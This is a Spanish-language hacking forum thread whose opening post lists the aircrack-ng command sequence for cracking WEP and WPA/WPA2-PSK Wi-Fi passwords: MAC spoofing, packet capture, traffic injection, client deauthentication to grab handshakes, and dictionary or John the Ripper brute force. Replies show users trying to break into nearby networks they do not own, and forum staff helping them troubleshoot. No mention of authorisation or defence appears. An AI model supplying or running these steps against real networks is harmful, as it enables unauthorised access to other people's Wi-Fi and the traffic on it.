Crackear WEP´s - WPA/WPA2/PSK [Resumen de Codigos]

  • 29 Respuestas
  • 26646 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5701
  • Actividad:
    100%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email

Crackear WEP´s - WPA/WPA2/PSK [Resumen de Codigos]

  • en: Marzo 27, 2011, 03:41:00 am
1. WEP`s:
 
 NOTA: En todos los casos reemplazar:
 XXXX: Interface
 ZZZZ: Canal
 YYYY: MAC BSSID
 RRR: ESSID
 
 
 1.1. Cambiar la MAC:
 
 A. airmon-ng (Ver la interface que usamos)
 B. airmon-ng stop XXXX (Detenemos el modo monitor)
 C. ifconfig XXXX down (Tiramos nuestra interface)
 D. macchanger --mac 00:11:22:33:44:55 XXXX (Cambiamos nuestra MAC, en este caso sera 00:11:22:33:44:55)
 E. airmon-ng start XXXX (Volvemos a iniciar el modo monitor)
 
 
 
 1.2. Buscar Redes:
 
 F. airodump-ng XXXX ( Scannea Redes)
 G. CTRL + C (Detiene el scanneo)
 H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos #DATAs) [No cerrar consola]
 
 
 
 1.3. Asociandonos a la red (En otra consola):
 
 I. aireplay-ng -1 0 -a YYYY -h 00:11:22:33:44:55 -e RRR XXXX (Asociacion con la red)
 
 
 
 1.4 Inyectando Trafico:
 
 J. aireplay-ng -3 -b YYYY -h 00:11:22:33:44:55 XXXX (Captura Datas a mas velocidad)
 
 
 
 1.5. Desencriptando la Clave (En otra consola):
 
 K. aircrack-ng datas-01.cap (Desencripta la clave con Aircrack)
 
 
 
 2. WPA/WPA2/PSK:
 
 NOTA: En todos los casos reemplazar:XXXX: Interface
 ZZZZ: Canal
 YYYY: MAC BSSID
 RRR: Interface modo monitor
 TTTT: Station
 
 
 
 2.1. Colocar la interface en modo monitor
 
 A. aimon-ng (Saber nuestra Interface)
 B. airmon-ng start XXXX (Colocamos en modo monitor nuestra Interface)
 
 
 
 2.2. Capturando el Handshake:
 
 C. airodump-ng RRR (Scannea redes)
 D. CTRL + C (Frena el scanneo)
 E. airodump-ng RRR --channel 1 --bssid YYYY -w /tmp/wpa2 (Guardara los *.cap en el directorio que le indicamos)
 F. aireplay-ng -0 1 -a YYYY -c TTTT RRR(Comenzara la captura del Handshake)
 
 
 
 2.3 Obteniendo la Clave:
 
 G.1. aircrack-ng -w /pentest/passwords/wordlists/wpa.txt -b YYYY /tmp/wpa2*.cap (Saca la Pass por Diccionario)
 G.2. /pentest/password/jtr/john --stdout --incremental:all | aircrack-ng -b YYYY -w - /tmp/wpa2*.cap (Saca la Pass por Fuerza Bruta con John The Ripper)
« Última modificación: Octubre 13, 2014, 03:26:57 pm por CloudswX »


Desconectado Zozro

  • *
  • Underc0der
  • Mensajes: 27
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Precioso el tuto amigo :D
Ya estoy obteniendo la calve :D

Desconectado kptkpt3610

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
no estoy muy metido en esto
por esto pregunto si este metodo vale para
windows 7  ultimate???

gracias de antemano.

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5701
  • Actividad:
    100%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email
Backtrack es Linux!


Desconectado comyro

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
holas yo tengo una pregunta referente a las claves wpa en el momento tengo una red con cifrado wpa tengo una tarjeta alfa de 1000w y tengo el backtrack 5 he estado utilizando el programa gerix que viene con el backtrack 5 logro hacer que se produsca el abrazo o el handske pero no logro decifrar la clave alguien me podria ayudar o recomendar algo para descifrar la clave de dicha red teniendo encuenta que en el momento solo cuento con las herramientas que mencione anteriormente y pues necesito internet ya que donde estoy el internet del modem de comcel es pesimo casi ni puedo entrar a la comu les agradesco muchisimo ;)

Desconectado syskc0

  • *
  • Underc0der
  • Mensajes: 39
  • Actividad:
    0%
  • Reputación 0
  • Hello Word !!
    • Ver Perfil
    • Email
saludos a todos los presentes ok esto de la desencriptacion de las wpa/wpa2 wpa-psk es la misma mierda solo se nesecita que el cliente asocie sus datos en la conecion al router te recomiendo estudies primero la arquitectura del router y el operador de estos en tu pais ya que estos manejan posibles clavez ya sea alfa , alfa numericas , simplemente numericas puedes interastuar con otras aplicaciones tales como jhon the ripper LA VERDAD no puedo sacar caracteres en mi blackberry o si le daba ejenplos
el mundo es una variable facil inicias facil terminas

=_=

Desconectado REC

  • *
  • Underc0der
  • Mensajes: 122
  • Actividad:
    0%
  • Reputación 0
  • o.O!
    • Ver Perfil
    • Email
Buen trabajo antrax!!
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login

Desconectado th3nolo

  • *
  • Underc0der
  • Mensajes: 50
  • Actividad:
    0%
  • Reputación 0
  • Los finales y comienzos son mis mayores peligros
    • Ver Perfil
Gracias Necesito un poco mas de información para claves wpa2

Desconectado @NetFcruz

  • *
  • Underc0der
  • Mensajes: 40
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
Hola ANTRAX querias que te prguntara, pues ahora necesito que me ayudes u orientes respecto a una red wiffi es wpa2 psk, al parecer tiene activado el wps, lo escaneo con Wireshark y me parece ser proveedor microsoft. Eh probado este tutorial pero al momento de dar el diccionario .cap me intenta cargar pero de ahi no paso. de aqui /tmp/wpa2*.cap, ese wpa2 es carpeta? y el *.cap es el archivo cierto.
Disculpa soy novato aqui  en este tema, no eh podido desencripar esa red.
System32
XD
You are not allowed to view links. Register or Login

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5701
  • Actividad:
    100%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email
Esto te va a despejar todas tus dudas:

You are not allowed to view links. Register or Login

este resumen de codigos es un extracto de ese tutorial

Saludos!


Desconectado @NetFcruz

  • *
  • Underc0der
  • Mensajes: 40
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
Bueno me lo bajo para leerlo alrato y practicarle.
Saludos y gracias hermano :D
System32
XD
You are not allowed to view links. Register or Login

Desconectado raul7

  • *
  • Underc0der
  • Mensajes: 12
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
escelente sintesis,,gracias ANTRAX

Desconectado Dixian

  • *
  • Underc0der
  • Mensajes: 18
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
yo tengo una duda, que pasa en wpa y wpa2 cuando recibis la mac pero no hay station( perdon por la duda soy nuevo en esto y estoy intentando aprender) segun lei, es porque no hay cliente asociado a esa mac, eso que significa? no hay usuario en ese momento generando data?
como hacer en un caso asi? puede ser que se puedan inyectar datos para generar station?

saludos!

Desconectado Snifer

  • *
  • Ex-Staff
  • *****
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • [email protected]'s
  • Twitter: sniferl4bs
    • Ver Perfil
    • Snifer@L4bs
Si no hay, quiere decir que no hay ningun cliente conectado solo te queda esperar que exista alguno para desautenticarlo

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado joechmen

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
Hola a todos, soy nuevo en esto de romper redes wifi, he estado intentando romper las wep que tengo en mi zona, pero me he quedado en la parte:

H. airodump-ng -c ZZZZ -w datas --bssid YYYY XXXX (Capturamos #DATAs) [No cerrar consola]

y es que no entiendo que va en la parte datas, ya que cuando le doy enter me sale un error y ahi me quedo  :( a ver si alguien me puede decir que debo colocar donde dice data ya que al poner lo mismo no me sale nada y solo da como error, espero me puedan ayudar gracias y buen aporte aunque no me funcione  ;D

Desconectado Snifer

  • *
  • Ex-Staff
  • *****
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • [email protected]'s
  • Twitter: sniferl4bs
    • Ver Perfil
    • Snifer@L4bs
DATA puede ser cualquier nombre que tu le des ya que es donde se almacenare los paquetes que estas capturando seria bueno que muestres el proceso que estas realizando para poder colaborarte

Regards,
Snifer
You are not allowed to view links. Register or Login


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado joechmen

  • *
  • Underc0der
  • Mensajes: 3
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
gracias por la respuesta, ahora estoy actualizando el kali linux, mañana intentare de nuevo y dare mas detalles para ver que puedo estar haciendo mal.

.................

Disculpen que escriba aca mismo pero es para agradecerles por la atención, me estaba equivocando en el bssid y por eso no me salia, ahora que lo intente de nuevo pude obtener el acceso pero claro con la WPS encendida si no, no pasa nada, gracias nuevamente.

saludos.
« Última modificación: Julio 12, 2013, 07:55:55 pm por joechmen »

Desconectado Snake0.0

  • *
  • Underc0der
  • Mensajes: 86
  • Actividad:
    0%
  • Reputación 0
  • El Saber Es Poder
  • Skype: Snake0.0 Underc0de
    • Ver Perfil
    • Email
You are not allowed to view links. Register or Login
Si no hay, quiere decir que no hay ningun cliente conectado solo te queda esperar que exista alguno para desautenticarlo

Regards,
Snifer

Si hay una manera Fijate en este video You are not allowed to view links. Register or Login  te enseña que podes falsificar usuario
« Última modificación: Abril 03, 2014, 01:45:13 pm por Snake0.0 »

Desconectado smallworm

  • *
  • Underc0der
  • Mensajes: 1
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
    • Email
You are not allowed to view links. Register or Login
Backtrack es Linux!

Y Desde Kali Linux Como Seria Con fuerza bruta ?

Conectado ANTRAX

  • *
  • Administrator
  • Mensajes: 5701
  • Actividad:
    100%
  • Country: ar
  • Reputación 37
  • ANTRAX
  • Skype: underc0de.org
  • Twitter: @Underc0de
    • Ver Perfil
    • Underc0de
    • Email
Igual!
Solo fijate en que directorio esta el jtr y listo

Saludos!
ANTRAX


 

Airolib-ng (El "Rapido" Crackeo de WPA/WPA2)

Iniciado por KzZiIi3l

Respuestas: 7
Vistas: 9311
Último mensaje Diciembre 07, 2011, 08:43:42 pm
por KzZiIi3l
Tema muy repetido / Crackeando redes WPA/WPA2 - Auditoría de redes con Wifislax!

Iniciado por Mayk0

Respuestas: 3
Vistas: 9669
Último mensaje Abril 16, 2018, 02:54:48 pm
por hackman2018
Así funciona KRACK, la herramienta que permite hackear redes WiFi con WPA2

Iniciado por kpredator1093

Respuestas: 5
Vistas: 9315
Último mensaje Abril 13, 2020, 04:58:16 am
por 4eryyy
WiFiBroot: una herramienta de craqueo de WiFi Pentest para WPA / WPA2

Iniciado por Gold Master

Respuestas: 4
Vistas: 6364
Último mensaje Abril 16, 2020, 04:46:00 am
por D136010
Crackeando redes con WPA/WPA2 desde cero by ANTRAX

Iniciado por ANTRAX

Respuestas: 43
Vistas: 37352
Último mensaje Julio 03, 2017, 07:19:54 pm
por hugo10